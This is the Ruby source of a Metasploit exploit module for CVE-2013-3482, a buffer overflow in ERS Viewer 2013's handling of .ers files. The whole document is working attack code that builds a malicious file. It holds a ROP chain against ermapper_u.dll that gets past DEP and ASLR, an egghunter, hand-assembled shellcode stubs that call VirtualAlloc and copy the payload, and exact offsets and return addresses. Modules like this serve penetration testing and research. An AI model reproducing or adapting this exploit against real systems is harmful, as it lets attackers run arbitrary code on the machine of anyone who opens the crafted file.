ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)


ERS Viewer 2013 '.ERS' File Handling Buffer Overflow (CVE-2013-3482) — Metasploit file-format exploit module

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

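class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Egghunter

  # Bytes that must not appear inside the VirtualAlloc stub that hunter_suffix
  # splices into the egghunter (the stub is part of the line the viewer parses).
  # The final payload is exempt: it rides in the egg and is copied verbatim.
  STUB_BADCHARS = "\x00\x0a\x0d"

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ERS Viewer 2013 ERS File Handling Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
        The vulnerability exists in the module ermapper_u.dll, where the function
        rf_report_error handles user provided data in a insecure way. It results in
        arbitrary code execution under the context of the user viewing a specially crafted
        .ers file. This module has been tested successfully with ERS Viewer 2013 (versions
        13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Fitts', # Vulnerability Discovery
          'juan vazquez' # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3482' ],
          [ 'OSVDB', '93650' ],
          [ 'URL', 'http://secunia.com/advisories/53620/' ]
        ],
      'Payload'        =>
        {
          # 4000 bytes keeps the payload length well below 0xffff, which the
          # DEP/ASLR target encodes as a 16-bit immediate (see hunter_suffix).
          'Space'    => 4000,
          'DisableNops' => true,
        },
      'DefaultOptions'  =>
        {
          'ExitFunction' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested on Windows XP SP3
          [ 'ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR',
            {
              'Offset' => 191,
              'Ret' => 0x100329E9 # jmp eax # from ermapper_u.dll
            }
          ],
          # Tested on Windows XP SP3 and Windows 7 SP1
          [ 'ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass',
            {
              'Offset' => 191,
              'Ret' => 0x100E1152,     # xchg eax, esp # ret # from ermapper_u.dll
              'RetNull' => 0x30d07f00, # ret ending with null byte # from ethrlib.dll
              'VirtualAllocPtr' => 0x1010c0f4 # IAT entry for VirtualAlloc in ermapper_u.dll
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 23 2013",
      'DefaultTarget'  => 1))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.ers']),
      ], self.class)

  end

  # True when the selected target is the one that needs the ROP chain and the
  # VirtualAlloc stub (the target names are the only thing that distinguishes
  # the two layouts).
  def dep_bypass_target?
    !!(target.name =~ /DEP & ASLR bypass/)
  end

  # True when the little-endian 16-bit encoding of +length+ contains none of
  # STUB_BADCHARS. hunter_suffix embeds the length as the immediate of
  # "add cx, imm16", so a bad byte there would corrupt the hunter itself.
  #
  # Raises ArgumentError if +length+ does not fit in 16 bits, since padding
  # could never make such a length encodable.
  def length_encodable?(length)
    if length > 0xffff
      raise ArgumentError, "payload length #{length} does not fit in 16 bits"
    end
    encoded = [length].pack("v").bytes.to_a
    (encoded & STUB_BADCHARS.bytes.to_a).empty?
  end

  # ROP chain (mona.py, corelan.be) that calls VirtualAlloc through the
  # ermapper_u.dll IAT and returns into the stack so the egghunter placed right
  # after it runs from executable memory. Register set-up, per the gadget
  # comments: ESI = VirtualAlloc, EBX = 1 (dwSize, 0xffffffff incremented twice;
  # VirtualAlloc rounds it up to a page), EDX = 0x1000 (flAllocationType),
  # ECX = 0x40 (flProtect), EBP = "push esp # ret"; PUSHAD then issues the call.
  # Only used with the DEP & ASLR bypass target. The IAT pointer below equals
  # that target's 'VirtualAllocPtr'.
  def create_rop_chain
    rop_gadgets =
      [
        0x10082624,    # POP EAX # RETN [ermapper_u.dll]
        0x1010c0f4,    # ptr to &VirtualAlloc() [IAT ermapper_u.dll]
        0x1001a9c0,    # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll]
        0x1005db36,    # XCHG EAX,ESI # RETN [ermapper_u.dll]
        0x10105d87,    # POP EBX # RETN [ermapper_u.dll]
        0xffffffff,    #
        0x30d059d9,    # INC EBX # RETN [ethrlib.dll]
        0x30d059d9,    # INC EBX # RETN [ethrlib.dll]
        0x100e9dd9,    # POP EAX # RETN [ermapper_u.dll]
        0xa2dbcf75,    # put delta into eax (-> put 0x00001000 into edx)
        0x1001aa04,    # ADD EAX,5D24408B # RETN [ermapper_u.dll]
        0x10016a98,    # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll]
        0x10086d21,    # RETN (ROP NOP) [ermapper_u.dll]
        0x1001a148,    # & push esp # ret  [ermapper_u.dll]
        0x10082624,    # POP EAX # RETN [ermapper_u.dll]
        0xffffffc0,    # Value to negate, will become 0x00000040
        0x100f687d,    # NEG EAX # RETN [ermapper_u.dll]
        0x1001e720,    # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll]
        0x100288b5,    # POP EAX # RETN [ermapper_u.dll]
        0x90909090,    # nop
        0x100e69e0,    # PUSHAD # RETN [ermapper_u.dll]
      ]

    rop_gadgets.pack("V*")
  end

  # Stack-pointer repair prepended to the payload: reads the TEB via fs:[0x18],
  # takes the StackLimit field at offset 8 and parks ESP 2000 bytes above it so
  # the payload's own pushes land in a sane, writable stack region.
  def fix_stack
    pivot = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18] # get teb
    pivot << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
    pivot << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
    pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
    pivot
  end

  # Replacement for the egghunter's final "jmp edi" on the DEP & ASLR bypass
  # target. With DEP on we cannot execute the egg where it was found, so the
  # stub calls VirtualAlloc(0x0c0c0c0c, 0x1000, 0x3000, 0x40) through the IAT,
  # copies +payload_length+ bytes from EDI (the egg) into the new mapping and
  # jumps to it. Constants are built arithmetically to keep the stub free of
  # STUB_BADCHARS; +payload_length+ is emitted as a raw 16-bit immediate, so the
  # caller must make sure it is encodable (see length_encodable?).
  def hunter_suffix(payload_length)
    # push flProtect (0x40)
    suffix = "\xB8\xC0\xFF\xFF\xFF"                              # mov eax, 0xffffffc0
    suffix << "\xF7\xD8"                                         # neg eax
    suffix << "\x50"                                             # push eax
    # push flAllocationType (0x3000)
    suffix << "\x66\x05\xC0\x2F"                                 # add ax, 0x2fc0
    suffix << "\x50"                                             # push eax
    # push dwSize (0x1000)
    suffix << "\x66\x2D\xFF\x1F"                                 # sub ax, 0x1fff
    suffix << "\x48"                                             # dec eax
    suffix << "\x50"                                             # push eax
    # push lpAddress
    suffix << "\xB8\x0C\x0C\x0C\x0C"                             # mov eax, 0x0c0c0c0c
    suffix << "\x50"                                             # push eax
    # Call VirtualAlloc
    suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc
    # Copy payload (edi) to Allocated memory (eax)
    suffix << "\x89\xFE"                                         # mov esi, edi
    suffix << "\x89\xC7"                                         # mov edi, eax
    suffix << "\x31\xC9"                                         # xor ecx, ecx
    suffix << "\x66\x81\xC1" + [payload_length].pack("v")        # add cx, payload_length
    suffix << "\xF3\xA4"                                         # rep movsb
    # Jmp to the final payload (eax)
    suffix << "\xFF\xE0"                                         # jmp eax

    suffix
  end

  # Assembles the overflowing string common to both targets:
  #   pad(1) | 01 02 03 04 | prefix | hunter | filler | Ret | pad(8) | egg
  # +prefix+ is "AA" for the NO DEP target and the RetNull bytes plus ROP chain
  # for the DEP & ASLR bypass target. The four fixed bytes and the prefix leave
  # EAX pointing at buf[5] (with a 0x00 prefix) after the return, which is what
  # the target's 'Ret' gadget relies on.
  #
  # Raises RuntimeError if prefix + hunter already overrun the target offset;
  # otherwise the return address would be misplaced silently.
  def build_buffer(prefix, hunter, egg)
    buf = rand_text_alpha(1)
    buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
    buf << prefix
    buf << hunter
    filler = target['Offset'] - buf.length
    if filler < 0
      raise RuntimeError, "prefix and egghunter exceed the #{target['Offset']} byte offset by #{-filler} bytes"
    end
    buf << rand_text_alpha(filler)
    buf << [target.ret].pack("V") # jmp eax, or xchg eax, esp # ret (DEP & ASLR bypass)
    buf << rand_text_alpha(8)
    buf << egg
    buf
  end

  def exploit

    # Bad characters for the generated egghunter; they do not apply to the final
    # payload, which travels in the egg.
    badchars = [0x0c, 0x0d, 0x0a].pack("C*")

    eggoptions =
      {
        :checksum => true,
        :eggtag => 'w00t'
      }
    my_payload = fix_stack + payload.encoded

    if dep_bypass_target?
      # The payload length is embedded in the copy stub as a 16-bit immediate,
      # so pad until neither byte is one of the stub's bad characters
      # (not only NUL: LF/CR would break the line the viewer parses).
      my_payload << rand_text(1) until length_encodable?(my_payload.length)
    end

    hunter, egg = generate_egghunter(my_payload, badchars, eggoptions)

    if dep_bypass_target?
      stub = hunter_suffix(my_payload.length)
      # Match on raw bytes: the /n flag keeps the high-byte escapes valid whatever
      # the source encoding, and the block form stops gsub from interpreting
      # backslash sequences (\1, \\, ...) that may occur in the binary stub.
      hunter = hunter.dup.force_encoding(Encoding::BINARY)
      hunter = hunter.gsub(/\xff\xe7/n) { stub }
      prefix = [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret
      prefix << create_rop_chain
    else
      prefix = "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret
    end

    buf = build_buffer(prefix, hunter, egg)

    ers = %Q|
DatasetHeader Begin
#{buf} End
    |

    file_create(ers)
  end
end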
